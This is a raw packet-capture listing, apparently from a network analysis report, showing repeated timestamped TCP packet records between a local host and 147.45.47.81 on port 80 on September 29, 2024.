                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342677116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342677116 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342696905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342722893 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342725992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342746019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342761993 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342767954 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342788935 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342804909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342811108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342849970 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343019009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343048096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343067884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343085051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343086004 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343110085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343116045 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343131065 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343149900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343163967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343167067 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343193054 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343204021 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343210936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343235016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343246937 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343251944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343276024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343290091 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343298912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343319893 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343337059 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343338013 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343363047 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343375921 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343394041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343419075 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343430042 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343436956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343471050 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343722105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343736887 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343765020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343779087 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343785048 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343806028 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343820095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343823910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343856096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343862057 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343875885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343900919 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343909025 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343919039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343943119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343955994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343955994 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343981981 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.343997955 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344003916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344023943 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344042063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344047070 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344062090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344083071 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344088078 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344109058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344125986 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344125986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344151020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344162941 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344167948 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344192028 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344203949 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344212055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344232082 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344247103 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344252110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344285011 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344597101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344618082 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344643116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344656944 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344664097 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344679117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344693899 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344707012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344724894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344738007 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344749928 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344779015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344786882 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344796896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344820976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344832897 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344840050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344863892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344872952 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344881058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344903946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344916105 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344923973 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344943047 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344958067 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344964981 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.344985008 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345000029 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345005989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345020056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345031023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345038891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345082045 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345329046 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345347881 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345370054 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345372915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345392942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345410109 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345412016 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345441103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345453024 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345468998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345489025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345504999 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345506907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345530033 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345550060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345555067 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345577955 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345587015 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345592976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345618963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345624924 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345639944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345659018 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345675945 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345679998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345716000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345751047 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345768929 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345793009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345808983 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345813990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345835924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345849037 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345853090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345875978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345887899 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345896959 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345917940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.345931053 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346343040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346360922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346385002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346385956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346406937 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346421957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346425056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346450090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346462965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346467972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346489906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346501112 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346512079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346549034 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346642017 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346669912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346688986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346708059 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346713066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346733093 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346748114 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346755028 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346775055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346788883 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346801043 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346820116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346837997 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346843004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346863985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346880913 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346890926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346911907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346925974 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346932888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346954107 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346972942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346982002 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.346993923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347009897 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347016096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347033978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347052097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347057104 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347078085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347094059 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347096920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347117901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347132921 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347138882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347160101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347172976 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347179890 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347199917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347214937 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347579002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347606897 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347620964 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347626925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347649097 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347661018 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347666025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347690105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347701073 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347711086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347740889 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347747087 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347769022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347790003 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347805977 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347807884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347831964 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347846985 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347851992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347898006 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347917080 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347923040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347940922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347961903 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347965002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.347985983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348001957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348006964 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348025084 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348048925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348048925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348069906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348086119 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348088026 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348119974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348130941 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348134995 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348161936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348176003 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348469019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348486900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348510981 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348529100 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348537922 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348543882 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348555088 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348575115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348589897 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348597050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348624945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348633051 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348643064 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348664999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348680019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348690033 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348711014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348731995 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348752022 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348752022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.348773956 CEST8049706147.45.47.81192.168.2.5
